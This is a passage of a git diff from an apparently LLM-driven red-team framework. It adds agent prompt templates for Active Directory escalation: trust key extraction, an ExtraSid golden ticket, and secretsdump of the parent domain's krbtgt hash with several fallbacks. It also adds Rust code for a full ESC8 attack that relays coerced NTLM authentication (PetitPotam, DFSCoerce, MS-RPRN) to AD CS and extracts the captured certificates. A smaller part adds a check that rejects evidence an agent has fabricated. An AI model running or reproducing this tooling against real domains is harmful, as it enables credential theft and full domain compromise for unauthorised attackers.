SPN target name validation blocks DRSUAPI:** +``` +secretsdump_kerberos( + target='{{ target_dc_hostname | default(value="") }}', + username='Administrator', + domain='{{ trusted_domain }}', + ticket_path='Administrator.ccache', + dc_ip='{{ target_dc_hint }}', + target_ip='{{ target_dc_hint }}', + just_dc_user='krbtgt' +) +``` + +**Fallback B — VSS shadow-copy if DRSUAPI is fully hardened:** +``` +secretsdump_kerberos( + target='{{ target_dc_hostname | default(value="") }}', + username='Administrator', + domain='{{ trusted_domain }}', + ticket_path='Administrator.ccache', + dc_ip='{{ target_dc_hint }}', + target_ip='{{ target_dc_hint }}', + use_vss=true +) +``` + +**Fallback C — direct PTH secretsdump with parent Administrator hash if known.** +If the parent Administrator NTLM hash has been harvested in a previous step, run: +``` +secretsdump( + target='{{ target_dc_hint }}', + username='Administrator', + domain='{{ trusted_domain }}', + hash='' +) +``` + +Report the parent krbtgt hash as a finding once obtained: +```json +{"hash": {"username": "krbtgt", "hash_value": "...", "hash_type": "NTLM", "domain": "{{ trusted_domain }}"}} +``` + +{% if state_context %} + +## Current Operation State + +{{ state_context }} +{% endif -%} +{% else -%} {% if has_trust_key -%} **TRUST KEY (already extracted):** `{{ trust_key }}` {% else -%} +{% if password or admin_hash -%} **STEP {{ step_extract }}: EXTRACT INTER-REALM TRUST KEY** ``` extract_trust_key( domain='{{ domain }}', username='{{ username }}', +{% if password -%} password='{{ password }}', +{% else -%} + hash='{{ admin_hash }}', +{% endif -%} dc_ip='{{ dc_ip }}', trusted_domain='{{ trusted_domain }}' ) @@ -22,6 +108,12 @@ extract_trust_key( -> Look for: trust account NTLM hash (e.g., {{ trusted_domain_prefix }}$ hash) -> Also extract AES256 key if available (needed for Windows 2016+) +{% else -%} +**STEP {{ step_extract }}: EXTRACT INTER-REALM TRUST KEY — credentials missing** +No password or admin_hash available. Source a DA-level credential or hash for +`{{ domain }}` first via DCSync, then retry trust key extraction. + +{% endif -%} {% endif -%} {% if needs_source_sid or needs_target_sid -%} **STEP {{ step_sid }}: RESOLVE DOMAIN SIDs** @@ -31,7 +123,11 @@ Source SID (resolve via source DC): get_sid( domain='{{ domain }}', username='{{ username }}', +{% if password -%} password='{{ password }}', +{% elif admin_hash -%} + hash='{{ admin_hash }}', +{% endif -%} dc_ip='{{ dc_ip }}' ) ``` @@ -61,16 +157,21 @@ create_inter_realm_ticket( extra_sid='{{ extra_sid_val }}-519'{% endif %} ) ``` --> Saves .ccache ticket file for cross-domain auth +-> Saves ticket to `Administrator.ccache` in working directory **STEP {{ step_secretsdump }}: USE TICKET FOR SECRETSDUMP ON TARGET DOMAIN** +{% if target_dc_hostname -%} +Target DC hostname: `{{ target_dc_hostname }}` +Target DC IP: `{{ target_dc_hint }}` +{% endif -%} ``` secretsdump_kerberos( - target='', + target='{{ target_dc_hostname | default(value="") }}', username='Administrator', domain='{{ trusted_domain }}', - ticket_path='', - target_ip='' + ticket_path='Administrator.ccache', + dc_ip='{{ target_dc_hint }}', + target_ip='{{ target_dc_hint }}' ) ``` -> Look for krbtgt hash = DOMAIN ADMIN on target domain! @@ -109,23 +210,30 @@ If manual steps above fail, use the automated approach: raise_child( child_domain='{{ domain }}', username='{{ username }}', - password='{{ password }}' + password='{{ password }}', + dc_ip='{{ dc_ip }}', + target_ip='{{ target_dc_hint }}' ) {% elif admin_hash -%} raise_child( child_domain='{{ domain }}', username='{{ username }}', - hash='{{ admin_hash }}' + hash='{{ admin_hash }}', + dc_ip='{{ dc_ip }}', + target_ip='{{ target_dc_hint }}' ) {% else -%} raise_child( child_domain='{{ domain }}', username='{{ username }}', - password='' + password='', + dc_ip='{{ dc_ip }}', + target_ip='{{ target_dc_hint }}' ) {% endif -%} ``` -> Automates: trust key extraction + ExtraSid golden ticket + parent DC secretsdump +-> `dc_ip`/`target_ip` are mandatory when DNS cannot resolve child/parent FQDNs from the operator host. {% endif -%} **CRITICAL NOTES:** @@ -146,3 +254,4 @@ Report any hashes obtained: {{ state_context }} {% endif -%} +{% endif -%} diff --git a/ares-llm/templates/redteam/tasks/recon.md.tera b/ares-llm/templates/redteam/tasks/recon.md.tera index c3f7d589..9a234781 100644 --- a/ares-llm/templates/redteam/tasks/recon.md.tera +++ b/ares-llm/templates/redteam/tasks/recon.md.tera @@ -5,13 +5,29 @@ {% endif -%} {% if credential_username %}**Credential:** {{ credential_username }}@{{ credential_domain }}{% if credential_password %} / Password: {{ credential_password }}{% endif %} {% endif -%} +{% if bind_domain %}**Bind Domain:** {{ bind_domain }} (use bind_domain={{ bind_domain }} in ldap_search when credential domain differs from target domain) +{% endif -%} +{% if technique -%} +**Technique:** {{ technique }} +{% endif -%} {% if techniques -%} **Requested Techniques:** {% for t in techniques -%} - {{ t }} {% endfor -%} -{% else -%} +{% endif -%} +{% if ntlm_hash -%} +**NTLM Hash (for pass-the-hash):** {{ ntlm_hash }}{% if hash_username %} (user: {{ hash_username }}){% endif %} +{% endif -%} + +{% if instructions -%} +## Instructions + +**IMPORTANT: Follow these instructions exactly. Do NOT perform generic scanning — execute only the specific technique described below.** + +{{ instructions }} +{% elif not techniques -%} Perform a comprehensive reconnaissance scan of the target. {% endif -%} diff --git a/ares-tools/Cargo.toml b/ares-tools/Cargo.toml index b519596b..9ecbbeff 100644 --- a/ares-tools/Cargo.toml +++ b/ares-tools/Cargo.toml @@ -17,6 +17,7 @@ uuid = { workspace = true } regex = { workspace = true } redis = { workspace = true } tempfile = "3" +base64 = "0.22" [features] default = ["blue"] diff --git a/ares-tools/src/acl.rs b/ares-tools/src/acl.rs index 48c239cd..f3c2a848 100644 --- a/ares-tools/src/acl.rs +++ b/ares-tools/src/acl.rs @@ -167,7 +167,7 @@ pub async fn pywhisker(args: &Value) -> Result { .flag("-p", password) .flag("--target", target_sam) .flag("--action", action) - .flag("-dc-ip", dc_ip) + .flag("--dc-ip", dc_ip) .timeout_secs(120) .execute() .await @@ -837,6 +837,8 @@ mod tests { assert_eq!(action_flag, "--AddComputerTask"); } + // --- mock executor tests: exercise full CommandBuilder code paths --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/blue/investigation/write.rs b/ares-tools/src/blue/investigation/write.rs index 7b065f49..35557f66 100644 --- a/ares-tools/src/blue/investigation/write.rs +++ b/ares-tools/src/blue/investigation/write.rs @@ -36,13 +36,24 @@ pub async fn add_evidence(args: &Value) -> Result { ))); } - // Validate evidence against recent query results and adjust confidence - let (query_validated, _source_query_id) = evidence_validator::validate_evidence_value(value); + // Grounding: refuse to write evidence whose value was not seen in any + // recent query result (or is a MITRE technique ID, which auto-validates). + // Without this check, an agent could fabricate an IP/user/hash and have it + // accepted as evidence — confidence-only penalties don't deter that. + let (query_validated, source_query_id) = evidence_validator::validate_evidence_value(value); + if !query_validated { + return Ok(make_error(&format!( + "Evidence rejected: value '{value}' was not found in any recorded query result. \ + Run a Loki/Prometheus query that returns this value first, then add it as evidence. \ + Evidence values must be IOCs grounded in observed data, not asserted by the agent." + ))); + } let raw_confidence = args .get("confidence") .and_then(Value::as_f64) .unwrap_or(0.5); let confidence = evidence_validator::adjust_confidence(raw_confidence, query_validated); + let _ = source_query_id; // Auto-assign pyramid level from evidence type when caller omits it let pyramid_level = optional_str(args, "pyramid_level") @@ -198,7 +209,17 @@ pub async fn add_evidence_batch(args: &Value) -> Result { continue; } + // Grounding: reject items whose value was not seen in any recent + // query result (MITRE technique IDs auto-validate inside + // `validate_evidence_value`). let (query_validated, _) = evidence_validator::validate_evidence_value(value); + if !query_validated { + validation_errors.push(format!( + "item[{i}] {evidence_type}={value}: value not found in any recorded query result \ + (run a query returning this IOC before recording it as evidence)" + )); + continue; + } let raw_confidence = item .get("confidence") .and_then(Value::as_f64) diff --git a/ares-tools/src/coercion.rs b/ares-tools/src/coercion.rs index 1e1e7901..759d30ec 100644 --- a/ares-tools/src/coercion.rs +++ b/ares-tools/src/coercion.rs @@ -4,9 +4,16 @@ //! produced by running the corresponding CLI tool as a subprocess. use std::io::Write; +use std::net::TcpListener; +use std::path::{Path, PathBuf}; +use std::process::Stdio; +use std::time::{Duration, Instant}; -use anyhow::Result; +use anyhow::{Context, Result}; +use base64::Engine; use serde_json::Value; +use tokio::process::{Child, Command as TokioCommand}; +use tokio::time::sleep; use crate::args::{optional_bool, optional_str, required_str}; use crate::executor::CommandBuilder; @@ -58,6 +65,7 @@ pub async fn coercer(args: &Value) -> Result { .arg("coerce") .flag("-t", target) .flag("-l", listener) + .arg("--always-continue") .timeout_secs(120); if let Some(u) = username { @@ -89,6 +97,7 @@ pub async fn petitpotam(args: &Value) -> Result { .flag("-t", target) .flag("-l", listener) .args(["--filter-protocol-name", "MS-EFSR"]) + .arg("--always-continue") .timeout_secs(60); if let Some(u) = username { @@ -116,8 +125,8 @@ pub async fn dfscoerce(args: &Value) -> Result { let domain = optional_str(args, "domain"); let mut cmd = CommandBuilder::new("dfscoerce") - .flag("-t", target) - .flag("-l", listener) + .arg(listener) + .arg(target) .timeout_secs(60); if let Some(u) = username { @@ -133,6 +142,25 @@ pub async fn dfscoerce(args: &Value) -> Result { cmd.execute().await } +/// Standalone-relay BUSY response. Standalone `ntlmrelayx_to_*` tools share +/// the host-wide port 445 (and SOCKS 1080) with `relay_and_coerce`; a second +/// invocation while one is already in flight crashes with +/// `OSError [Errno 98] Address already in use`. We acquire the same loopback +/// sentinel the composite path uses and refuse to race when contended. +fn relay_busy_output(tool: &str) -> ToolOutput { + ToolOutput { + stdout: format!( + "RELAY_BIND_BUSY\n{tool}: another relay/coerce invocation is active \ + on this host (loopback port {RELAY_LOCK_PORT} held). Refusing to \ + race for ntlmrelayx port 445; retry after the in-flight relay \ + completes." + ), + stderr: String::new(), + exit_code: Some(0), + success: false, + } +} + /// Relay captured NTLM authentication to LDAPS for delegation abuse. /// /// Required args: `dc_ip` @@ -141,6 +169,11 @@ pub async fn ntlmrelayx_to_ldaps(args: &Value) -> Result { let dc_ip = required_str(args, "dc_ip")?; let delegate_access = optional_bool(args, "delegate_access").unwrap_or(false); + let _lock = match try_acquire_relay_lock() { + Some(l) => l, + None => return Ok(relay_busy_output("ntlmrelayx_to_ldaps")), + }; + let target_url = format!("ldaps://{dc_ip}"); CommandBuilder::new("impacket-ntlmrelayx") @@ -159,6 +192,11 @@ pub async fn ntlmrelayx_to_adcs(args: &Value) -> Result { let ca_host = required_str(args, "ca_host")?; let template = optional_str(args, "template"); + let _lock = match try_acquire_relay_lock() { + Some(l) => l, + None => return Ok(relay_busy_output("ntlmrelayx_to_adcs")), + }; + let target_url = format!("http://{ca_host}/certsrv/certfnsh.asp"); CommandBuilder::new("impacket-ntlmrelayx") @@ -179,15 +217,850 @@ pub async fn ntlmrelayx_to_smb(args: &Value) -> Result { let socks = optional_bool(args, "socks").unwrap_or(false); let interactive = optional_bool(args, "interactive").unwrap_or(false); + let _lock = match try_acquire_relay_lock() { + Some(l) => l, + None => return Ok(relay_busy_output("ntlmrelayx_to_smb")), + }; + CommandBuilder::new("impacket-ntlmrelayx") .flag("-t", target_ip) - .arg_if(socks, "--socks") + .arg_if(socks, "-socks") .arg_if(interactive, "-i") .timeout_secs(120) .execute() .await } +/// Parsed + validated args for [`relay_and_coerce`]. Pulled into a struct so +/// the validation logic can be unit-tested without spawning subprocesses. +#[derive(Debug, Clone, PartialEq, Eq)] +struct RelayCoerceConfig { + ca_host: String, + coerce_target: String, + attacker_ip: String, + coerce_user: Option, + coerce_domain: String, + coerce_secret: Option, + template: String, +} + +#[derive(Debug, Clone, PartialEq, Eq)] +enum CoerceSecret { + Hash(String), + Password(String), +} + +fn parse_relay_coerce_args(args: &Value) -> Result { + let ca_host = required_str(args, "ca_host")?; + // Accept legacy `target_dc` as an alias for backwards compat with state + // injected before the rename. + let coerce_target = optional_str(args, "coerce_target") + .or_else(|| optional_str(args, "target_dc")) + .ok_or_else(|| { + anyhow::anyhow!("relay_and_coerce: missing required argument 'coerce_target'") + })?; + let attacker_ip = required_str(args, "attacker_ip")?; + let coerce_user = optional_str(args, "coerce_user").filter(|s| !s.is_empty()); + let coerce_domain = optional_str(args, "coerce_domain").unwrap_or(""); + let coerce_hash = optional_str(args, "coerce_hash").filter(|s| !s.is_empty()); + let coerce_password = optional_str(args, "coerce_password").filter(|s| !s.is_empty()); + let template = optional_str(args, "template").unwrap_or("DomainController"); + + // Source ≠ target. Coercing the CA host itself triggers same-machine + // NTLM loopback rejection at IIS. Conservative literal compare — callers + // mixing hostname/IP across the two args still slip through, that's their + // problem to keep distinct. + if coerce_target == ca_host { + anyhow::bail!( + "relay_and_coerce: coerce_target ({coerce_target}) must differ from ca_host \ + ({ca_host}); same-machine NTLM loopback protection blocks relayed auth. \ + Coerce a different machine account (e.g. another DC) and relay it to this CA." + ); + } + + if coerce_user.is_some() && coerce_hash.is_none() && coerce_password.is_none() { + anyhow::bail!( + "relay_and_coerce: coerce_user provided without coerce_hash or coerce_password" + ); + } + + // Defensive newline check so a stray input can't smuggle a second arg + // into a child process via env propagation. Single-quote no longer matters + // (no shell), but keep newline reject — embedded newlines in a hash or + // hostname are always wrong. + for (name, val) in [ + ("ca_host", ca_host), + ("coerce_target", coerce_target), + ("attacker_ip", attacker_ip), + ("coerce_user", coerce_user.unwrap_or("")), + ("coerce_domain", coerce_domain), + ("template", template), + ] { + if val.contains('\n') || val.contains('\'') { + anyhow::bail!("{name} contains forbidden character (newline or single-quote)"); + } + } + + let coerce_secret = if let Some(h) = coerce_hash { + if h.contains('\n') || h.contains('\'') || h.contains(' ') { + anyhow::bail!("coerce_hash contains forbidden character"); + } + Some(CoerceSecret::Hash(h.to_string())) + } else if let Some(p) = coerce_password { + if p.contains('\n') || p.contains('\'') { + anyhow::bail!("coerce_password contains forbidden character"); + } + Some(CoerceSecret::Password(p.to_string())) + } else { + None + }; + + Ok(RelayCoerceConfig { + ca_host: ca_host.to_string(), + coerce_target: coerce_target.to_string(), + attacker_ip: attacker_ip.to_string(), + coerce_user: coerce_user.map(String::from), + coerce_domain: coerce_domain.to_string(), + coerce_secret, + template: template.to_string(), + }) +} + +// === Trait-based execution seam ===================================== +// +// The phase-progression logic (spawn relay → run coerce phases → poll +// log → extract cert) is exercised by unit tests via FakeCoerceProcs, +// which scripts subprocess outcomes and relay-log writes. Production +// uses RealCoerceProcs which wraps tokio::process::{Command,Child}. + +trait RelayHandle { + fn pid(&self) -> u32; + /// Sleep `settle` (giving the process time to bind ports), then check + /// whether it has already exited. Returns the exit code if so. + async fn settle_then_try_wait(&mut self, settle: Duration) -> Option; + async fn kill_and_wait(&mut self, timeout: Duration); +} + +trait CoerceProcs { + type Handle: RelayHandle; + fn is_local_ip(&self, ip: &str) -> bool; + fn list_local_ips(&self) -> Vec; + fn which_binary(&self, name: &str) -> bool; + async fn cleanup_stale_listeners(&self, workdir: &Path); + async fn spawn_relay( + &self, + target_url: &str, + template: &str, + relay_log: &Path, + workdir: &Path, + ) -> Result; + async fn run_phase( + &self, + coerce_log: &Path, + header: &str, + bin: &str, + args: &[&str], + cwd: &Path, + timeout_secs: u64, + ); +} + +#[derive(Debug, Clone, Copy)] +struct RunOptions { + relay_settle: Duration, + poll_interval: Duration, + poll_phase_1: Duration, + poll_phase_2: Duration, + poll_phase_3: Duration, + post_capture_settle: Duration, + relay_kill_timeout: Duration, + keep_workdir_on_capture: bool, + /// Whether to acquire the host-wide TCP-port mutex before spawning the + /// relay. Production sets this to `true` to serialize concurrent + /// invocations across worker processes; unit tests set `false` so they + /// can run in parallel without fighting over the loopback sentinel port. + acquire_host_lock: bool, +} + +impl RunOptions { + fn production() -> Self { + Self { + relay_settle: Duration::from_secs(3), + poll_interval: Duration::from_millis(500), + poll_phase_1: Duration::from_secs(8), + poll_phase_2: Duration::from_secs(10), + poll_phase_3: Duration::from_secs(8), + post_capture_settle: Duration::from_secs(5), + relay_kill_timeout: Duration::from_secs(5), + keep_workdir_on_capture: true, + acquire_host_lock: true, + } + } +} + +// --- Real (production) implementation ------------------------------- + +struct RealCoerceProcs; + +struct RealRelayHandle { + child: Child, +} + +impl RelayHandle for RealRelayHandle { + fn pid(&self) -> u32 { + self.child.id().unwrap_or(0) + } + + async fn settle_then_try_wait(&mut self, settle: Duration) -> Option { + sleep(settle).await; + match self.child.try_wait() { + Ok(Some(status)) => Some(status.code().unwrap_or(-1)), + _ => None, + } + } + + async fn kill_and_wait(&mut self, timeout: Duration) { + let _ = self.child.start_kill(); + let _ = tokio::time::timeout(timeout, self.child.wait()).await; + } +} + +impl CoerceProcs for RealCoerceProcs { + type Handle = RealRelayHandle; + + fn is_local_ip(&self, ip: &str) -> bool { + use std::net::{IpAddr, UdpSocket}; + let parsed: IpAddr = match ip.parse() { + Ok(addr) => addr, + Err(_) => return false, + }; + if parsed.is_loopback() || parsed.is_unspecified() || parsed.is_multicast() { + return false; + } + UdpSocket::bind((parsed, 0)).is_ok() + } + + fn list_local_ips(&self) -> Vec { + use std::net::UdpSocket; + let mut out = Vec::new(); + if let Ok(sock) = UdpSocket::bind("0.0.0.0:0") { + if sock.connect("8.8.8.8:53").is_ok() { + if let Ok(local) = sock.local_addr() { + let ip = local.ip().to_string(); + if !ip.starts_with("127.") { + out.push(ip); + } + } + } + } + out + } + + fn which_binary(&self, name: &str) -> bool { + let Some(path) = std::env::var_os("PATH") else { + return false; + }; + for dir in std::env::split_paths(&path) { + if dir.join(name).is_file() { + return true; + } + } + false + } + + async fn cleanup_stale_listeners(&self, workdir: &Path) { + // pkill returns 1 if no match — fine; we want at-most-once semantics, + // not strict success. ntlmrelayx surfaces RELAY_BIND_FAILED later if a + // non-impacket process is still holding the ports. + for pat in [ + "impacket-ntlmrelayx", + "ntlmrelayx.py", + "Responder.py", + "impacket-petitpotam", + ] { + let _ = TokioCommand::new("pkill") + .arg("-f") + .arg(pat) + .stdin(Stdio::null()) + .stdout(Stdio::null()) + .stderr(Stdio::null()) + .current_dir(workdir) + .status() + .await; + } + sleep(Duration::from_millis(500)).await; + } + + async fn spawn_relay( + &self, + target_url: &str, + template: &str, + relay_log: &Path, + workdir: &Path, + ) -> Result { + let relay_log_out = std::fs::File::create(relay_log).context("create relay.log")?; + let relay_log_err = relay_log_out.try_clone().context("dup relay.log fd")?; + // ntlmrelayx writes captured PFXs (and BloodHound JSON) relative to its + // own CWD. Pin it to the workdir so artifacts land where we can find + // them (and not in the worker's `/`). --keep-relaying prevents the + // first inbound (often anonymous) connection from causing "All targets + // processed!" before the real coerced DC calls back. + let child = TokioCommand::new("impacket-ntlmrelayx") + .arg("-t") + .arg(target_url) + .arg("--adcs") + .arg("--template") + .arg(template) + .arg("-smb2support") + .arg("--keep-relaying") + .arg("--no-da") + .arg("--no-acl") + .arg("--no-validate-privs") + .arg("--no-dump") + .current_dir(workdir) + .stdin(Stdio::piped()) + .stdout(Stdio::from(relay_log_out)) + .stderr(Stdio::from(relay_log_err)) + .kill_on_drop(true) + .spawn() + .context("failed to spawn impacket-ntlmrelayx (is it installed?)")?; + Ok(RealRelayHandle { child }) + } + + async fn run_phase( + &self, + coerce_log: &Path, + header: &str, + bin: &str, + args: &[&str], + cwd: &Path, + timeout_secs: u64, + ) { + let mut cmd = TokioCommand::new(bin); + for a in args { + cmd.arg(a); + } + cmd.current_dir(cwd).stdin(Stdio::null()); + let timeout = Duration::from_secs(timeout_secs); + match tokio::time::timeout(timeout, cmd.output()).await { + Ok(Ok(out)) => append_output(coerce_log, header, &out).await, + Ok(Err(e)) => append_error(coerce_log, header, &format!("spawn failed: {e}")).await, + Err(_) => { + append_error( + coerce_log, + header, + &format!("timed out after {timeout_secs}s"), + ) + .await + } + } + } +} + +/// Composite ESC8 relay+coerce. Starts ntlmrelayx targeting AD CS web +/// enrollment, coerces a chosen machine account over unauth PetitPotam → +/// authenticated DFSCoerce → MS-EFSR → MS-RPRN until the relay log shows a +/// cert capture, then decodes the base64 cert from the log and emits +/// deterministic `PFX_FILE=` / `RELAYED_USER=` markers for the parser. +/// +/// Required args: `ca_host`, `coerce_target`, `attacker_ip`. +/// Optional args: `coerce_user`, `coerce_domain`, `coerce_hash` / +/// `coerce_password`, `template` (default "DomainController"). +/// +/// **Source ≠ target.** `coerce_target` MUST differ from `ca_host`. When CA +/// is co-located on the DC (common in lab AD), coercing the same host triggers +/// Microsoft's same-machine NTLM loopback protection and ADCS rejects the +/// relayed auth. Coerce a different DC or member instead — e.g. a child-DC +/// machine account relayed to the parent forest's CA. +/// +/// Phase 1 always runs unauthenticated PetitPotam (works against unpatched +/// DCs without creds). Phase 2 runs authenticated DFSCoerce. Phase 3 runs +/// `coercer` for MS-EFSR / MS-RPRN. Phases 2/3 are skipped when no creds +/// are supplied. +pub async fn relay_and_coerce(args: &Value) -> Result { + let cfg = parse_relay_coerce_args(args)?; + run_relay_and_coerce(cfg, &RealCoerceProcs, RunOptions::production()).await +} + +/// Host-wide TCP-port mutex. ntlmrelayx binds 0.0.0.0:445 (and 80) globally; +/// two relay invocations racing on the same host produce +/// `OSError [Errno 98] Address already in use` and the loser silently fails +/// to relay anything. The orchestrator dispatches `relay_and_coerce` from +/// multiple workers (separate processes), so an intra-process Mutex is not +/// enough — we need cross-process serialization. +/// +/// Trick: bind a TCP listener to a fixed loopback port (41445). The kernel +/// guarantees only one process can hold the port at a time, and releases it +/// automatically when the listener is dropped or the process dies. No file +/// cleanup required, no stale-lock races. Hold the returned listener for the +/// lifetime of the relay; drop it (implicitly) to release. +const RELAY_LOCK_PORT: u16 = 41445; + +#[cfg(test)] +thread_local! { + /// When set on a test thread, [`try_acquire_relay_lock`] uses the real + /// host-wide port instead of bypassing it. The contention test sets this + /// so its assertion that a held port returns `None` still works; all other + /// tests leave it false so they don't fight over the single port. + static USE_REAL_RELAY_LOCK_IN_TEST: std::cell::Cell = + const { std::cell::Cell::new(false) }; +} + +fn try_acquire_relay_lock() -> Option { + #[cfg(test)] + { + // Default test behavior: bind to an ephemeral loopback port so tests + // never contend on the single host-wide sentinel. Tests that need to + // exercise contention semantics opt in via USE_REAL_RELAY_LOCK_IN_TEST. + if !USE_REAL_RELAY_LOCK_IN_TEST.with(|c| c.get()) { + return TcpListener::bind("127.0.0.1:0").ok(); + } + } + use std::net::SocketAddr; + let addr: SocketAddr = ([127, 0, 0, 1], RELAY_LOCK_PORT).into(); + TcpListener::bind(addr).ok() +} + +async fn run_relay_and_coerce( + cfg: RelayCoerceConfig, + procs: &P, + opts: RunOptions, +) -> Result { + // attacker_ip MUST be one of our local interface IPs. The LLM has been + // observed to misread context and pass a *target* host (e.g. CASTELBLACK) + // as the attacker IP, which makes the relay listener bind to 0.0.0.0 but + // PetitPotam tells the coerced DC to authenticate back to the wrong host + // — auth never reaches the relay. Fail fast with a clear error. + if !procs.is_local_ip(&cfg.attacker_ip) { + anyhow::bail!( + "relay_and_coerce: attacker_ip ({}) is not a local interface IP. \ + Pass the listener_ip / attacker_ip exactly as supplied by the \ + orchestrator payload — this MUST be the attacker host's IP \ + (where the relay listener binds), NOT a target machine. \ + Available local IPs: {}", + cfg.attacker_ip, + procs.list_local_ips().join(", "), + ); + } + + // Acquire the host-wide relay lock BEFORE any teardown of stale listeners. + // If another relay_and_coerce invocation is in flight on this host, refuse + // immediately with RELAY_BIND_BUSY rather than racing it for port 445 and + // both losing — the dispatcher's dedup will retry on the next tick. + // + // Must come before `cleanup_stale_listeners`; otherwise we'd pkill the + // in-flight peer's ntlmrelayx and corrupt its capture mid-flight. + // + // The listener is held in `_relay_lock` so the kernel keeps the port bound + // for the whole function body. Drop on return automatically releases it. + let _relay_lock = if opts.acquire_host_lock { + match try_acquire_relay_lock() { + Some(l) => Some(l), + None => { + return Ok(ToolOutput { + stdout: format!( + "RELAY_BIND_BUSY\nAnother relay_and_coerce is active on this \ + host (loopback port {RELAY_LOCK_PORT} held). Refusing to race \ + for ntlmrelayx port 445; retry after the in-flight relay \ + completes." + ), + stderr: String::new(), + exit_code: Some(0), + success: false, + }); + } + } + } else { + None + }; + + let tempdir = tempfile::Builder::new() + .prefix("ares_relay_") + .tempdir() + .context("failed to create relay workdir")?; + let workdir = tempdir.path().to_path_buf(); + let relay_log = workdir.join("relay.log"); + let coerce_log = workdir.join("coerce.log"); + + procs.cleanup_stale_listeners(&workdir).await; + + let target_url = format!("http://{}/certsrv/certfnsh.asp", cfg.ca_host); + let mut relay = procs + .spawn_relay(&target_url, &cfg.template, &relay_log, &workdir) + .await?; + + // Give it a moment to bind ports; if it died, surface RELAY_BIND_FAILED. + if let Some(code) = relay.settle_then_try_wait(opts.relay_settle).await { + let log = tokio::fs::read_to_string(&relay_log) + .await + .unwrap_or_default(); + return Ok(ToolOutput { + stdout: format!("RELAY_BIND_FAILED\n{log}"), + stderr: String::new(), + exit_code: Some(code), + success: false, + }); + } + + let mut summary = format!("RELAY_PID={}\n", relay.pid()); + let mut captured_via: Option<&'static str> = None; + + // --- Phase 1: unauthenticated PetitPotam --- + // Distros differ: Kali ships `petitpotam` (symlink), pip ships + // `impacket-petitpotam`. Try in order, log if both missing. + summary.push_str("=== Phase 1: unauth PetitPotam ===\n"); + let petit_bin = ["petitpotam", "impacket-petitpotam"] + .into_iter() + .find(|b| procs.which_binary(b)) + .unwrap_or("petitpotam"); + // PetitPotam positional args are `target path` (where `target` is the + // machine being coerced and `path` is the UNC the target authenticates + // back to). Reversing them coerces the attacker host onto itself. + let unc_path = format!("\\\\{}\\share\\x", cfg.attacker_ip); + let p1_args: [&str; 2] = [cfg.coerce_target.as_str(), unc_path.as_str()]; + procs + .run_phase( + &coerce_log, + "Phase 1: unauth PetitPotam", + petit_bin, + &p1_args, + &workdir, + 25, + ) + .await; + if poll_for_cert(&relay_log, opts.poll_phase_1, opts.poll_interval).await { + captured_via = Some("unauth_petitpotam"); + } + + // --- Phase 2: authenticated DFSCoerce --- + if captured_via.is_none() && cfg.coerce_user.is_some() { + summary.push_str("=== Phase 2: authenticated DFSCoerce (MS-DFSNM) ===\n"); + let user = cfg.coerce_user.as_deref().unwrap(); + let secret_args = coerce_secret_args(cfg.coerce_secret.as_ref()); + let mut a: Vec<&str> = vec!["-u", user, "-d", cfg.coerce_domain.as_str()]; + for s in &secret_args { + a.push(s.as_str()); + } + a.push(cfg.attacker_ip.as_str()); + a.push(cfg.coerce_target.as_str()); + procs + .run_phase( + &coerce_log, + "Phase 2: DFSCoerce", + "dfscoerce", + &a, + &workdir, + 25, + ) + .await; + if poll_for_cert(&relay_log, opts.poll_phase_2, opts.poll_interval).await { + captured_via = Some("MS-DFSNM"); + } + } + + // --- Phase 3: coercer over MS-EFSR / MS-RPRN --- + if captured_via.is_none() && cfg.coerce_user.is_some() { + let user = cfg.coerce_user.as_deref().unwrap(); + let secret_args = coerce_secret_args(cfg.coerce_secret.as_ref()); + for proto in ["MS-EFSR", "MS-RPRN"] { + summary.push_str(&format!( + "=== Phase 3: authenticated coerce via {proto} ===\n" + )); + let mut a: Vec<&str> = vec![ + "coerce", + "-u", + user, + "-d", + cfg.coerce_domain.as_str(), + "-t", + cfg.coerce_target.as_str(), + "-l", + cfg.attacker_ip.as_str(), + "--filter-protocol-name", + proto, + "--auth-type", + "smb", + "--always-continue", + ]; + for s in &secret_args { + a.push(s.as_str()); + } + procs + .run_phase( + &coerce_log, + &format!("Phase 3: {proto}"), + "coercer", + &a, + &workdir, + 25, + ) + .await; + if poll_for_cert(&relay_log, opts.poll_phase_3, opts.poll_interval).await { + captured_via = Some(proto); + break; + } + } + } + + // Allow any in-flight ADCS request to finish writing the cert. + if captured_via.is_some() { + sleep(opts.post_capture_settle).await; + } + + relay.kill_and_wait(opts.relay_kill_timeout).await; + + // Extract cert from the relay log if captured. Two ntlmrelayx output + // shapes need handling: + // 1. `--adcs` (our path) — writes the PFX to disk and logs + // "Writing PKCS#12 certificate to ./.pfx" + earlier + // "Authenticating connection from .../$@ip" lines. + // 2. `--ldap` userCertificate — logs "Base64 certificate of user :" + // followed by the base64 blob on the next line. Kept as fallback. + let mut pfx_path: Option = None; + let mut relayed_user: Option = None; + if captured_via.is_some() { + let log = tokio::fs::read_to_string(&relay_log) + .await + .unwrap_or_default(); + + if let Some(cap) = extract_pfx_capture_from_log(&log) { + let bare = cap.pfx_basename.trim_start_matches("./"); + let candidate = workdir.join(bare); + if tokio::fs::metadata(&candidate).await.is_ok() { + pfx_path = Some(candidate); + relayed_user = Some(cap.user); + } + } + + if pfx_path.is_none() { + if let Some((user, b64)) = extract_cert_from_log(&log) { + let pfx = workdir.join(format!("{user}.pfx")); + let cleaned: String = b64.chars().filter(|c| !c.is_whitespace()).collect(); + if let Ok(bytes) = base64::engine::general_purpose::STANDARD.decode(&cleaned) { + if !bytes.is_empty() && tokio::fs::write(&pfx, &bytes).await.is_ok() { + pfx_path = Some(pfx); + relayed_user = Some(user); + } + } + } + } + } + + let mut stdout = summary; + if let Some(via) = captured_via { + stdout.push_str(&format!("CERT_CAPTURED_VIA={via}\n")); + } + if let (Some(p), Some(u)) = (pfx_path.as_ref(), relayed_user.as_ref()) { + stdout.push_str(&format!("PFX_FILE={}\n", p.display())); + stdout.push_str(&format!("RELAYED_USER={u}\n")); + } + stdout.push_str("=== RELAY LOG ===\n"); + stdout.push_str( + &tokio::fs::read_to_string(&relay_log) + .await + .unwrap_or_default(), + ); + stdout.push_str("=== COERCE LOG ===\n"); + stdout.push_str( + &tokio::fs::read_to_string(&coerce_log) + .await + .unwrap_or_default(), + ); + + let success = pfx_path.is_some(); + + // Persist workdir if we resolved a PFX OR if a cert was captured (so + // operators can debug extraction failures without losing the artifact). + if (success || captured_via.is_some()) && opts.keep_workdir_on_capture { + let _ = tempdir.keep(); + } + + Ok(ToolOutput { + stdout, + stderr: String::new(), + exit_code: Some(if success { 0 } else { 1 }), + success, + }) +} + +fn 